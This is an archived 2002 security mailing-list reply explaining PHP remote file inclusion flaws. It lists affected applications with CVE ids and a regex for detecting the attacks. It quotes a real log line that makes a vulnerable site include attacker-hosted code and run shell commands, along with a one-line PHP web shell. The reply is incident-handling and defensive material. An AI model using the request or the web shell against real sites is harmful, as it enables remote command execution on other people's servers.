Security Incidents mailing list archives
Re: Good practicle php attack example
From: "Steven M. Christey" <coley () linus mitre org>
Date: Wed, 18 Sep 2002 22:49:26 -0400 (EDT)
zeno <bugtraq () cgisecurity net> said:
I figured a few people may find this interesting. 200.152.80.22 - - [14/Sep/2002:16:47:23 -0400] "GET /index.php?file=http://www.jtecx.hpg.com.br/jtec.txt&cmd=uname%20-a;id HTTP/1.0" 404 2656 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Q312461)" contents of www.jtecx.hpg.com.br/jtec.txt ------------------- start snip <?php system($cmd); ?> ------------------- end snip
A number of PHP scripts have demonstrated this type of vulnerability, which was documented in "A Study In Scarlet - Exploiting Common Vulnerabilities in PHP Applications" by Shaun Clowes; see http://www.securereality.com.au/studyinscarlet.txt (http://www.zend.com/zend/art/art-oertli.php also looks useful). This has been a topic of discussion on the webappsec list. Basically, PHP can allow the programmer to access files from remote sites. PHP scripts that don't properly filter arguments to an "include" command can have a remote URL injected by the attacker. PHP also allows you to define variables as a parameter (field) into the script. The combination of these factors makes it easy for an attacker to execute code in the vulnerable application. Note: this may be dependent on configuration and/or the PHP version. Some vulnerable applications are: BUGTRAQ:20001125 Security problems with TWIG webmail system URL:http://marc.theaimsgroup.com/?l=bugtraq&m=97535137010910&w=2 (CVE: CVE-2000-1166) BUGTRAQ:20020116 PHP-Nuke allows Command Execution & Much more URL:http://marc.theaimsgroup.com/?l=bugtraq&m=101121913914205&w=2 (CVE: CAN-2002-0206) [this could be the vulnerability being exploited in zeno's example] BUGTRAQ:20020506 b2 php remote command execution URL:http://marc.theaimsgroup.com/?l=bugtraq&m=102069726727513&w=2 (CVE: CAN-2002-0734) BUGTRAQ:20020517 Phorum 3.3.2a remote command execution URL:http://marc.theaimsgroup.com/?l=bugtraq&m=102167071314746&w=2 (CVE: CAN-2002-0764) A generic Perl regular expression to catch some of these exploits is: /\.php[2-9]?\?.*=http:\/\// This seems to do a good job, although it could generate some false positives for valid PHP scripts that pass URLs as arguments, e.g. for redirecting the user out of the site. - Steve ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- Good practicle php attack example zeno (Sep 17)
- Re: Good practicle php attack example Harald Finnaas (Sep 18)
- <Possible follow-ups>
- Re: Good practicle php attack example Steven M. Christey (Sep 19)
- Re: Good practicle php attack example Steven M. Christey (Sep 22)